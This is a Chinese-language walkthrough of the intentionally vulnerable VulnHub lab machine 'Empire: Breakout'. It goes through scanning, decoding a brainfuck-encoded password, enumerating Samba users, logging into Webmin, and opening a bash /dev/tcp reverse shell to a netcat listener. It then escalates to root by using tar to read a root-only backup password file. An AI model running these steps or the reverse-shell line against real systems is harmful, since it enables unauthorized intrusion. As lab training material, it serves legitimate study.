靶机入侵——Empire: Breakout
1、环境搭建
下载地址:http://www.vulnhub.com/entry/empire-breakout,751/
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
2、信息收集
-
主机发现
使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
192.168.80.139 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24 -
端口扫描
使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.139
发现开放了80、139、445、10000、20000端口 -
web端进一步信息收集
一次访问开放web服务的端口,80端口为Apache默认页面,10000和20000是webmin服务
3、漏洞探测
-
80端口探测
查看默认页面发现一串加密信息,很明显是 brainfuck 加密的数据
进行解密得到.2uqPEfj3D<P’a-3,这很可能是一串密码
使用dirsearch进行目录扫描,未发现敏感目录
-
webmin服务探测
10000和20000均是webmin系统的登录界面,口令爆破、目录探测无果。搜索历史漏洞进行利用,利用失败或需要用户名和密码。
-
samba服务探测
使用enum4linux工具进行探测,得到一个cyber用户。
enum4linux 192.168.80.139
-
尝试用得到的密码和用户登录webmin系统
成功进入后台,寻找可利用点。发现可以执行命令
-
利用后台命令功能反弹shell
攻击机开启监听:nc -lvvp 10086
bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.80.130/10086 <&1'
4、权限提升
- 查看可以免密使用的root级别命令:sudo -l
没找到可利用的
-
find uid提权失败
find / -perm -4000 -print 2>/dev/null
-
查找目录
在/home/cyber 发现tar可直接执行
在/var/backups发现一个"旧密码文件"
此文件需要root权限才能解压,可利用cyber下的tar -
tar命令压缩解压文件
得到一个密码Ts&4&YurgtRX(=~h
-
尝试使用密码su切换root用户
提权成功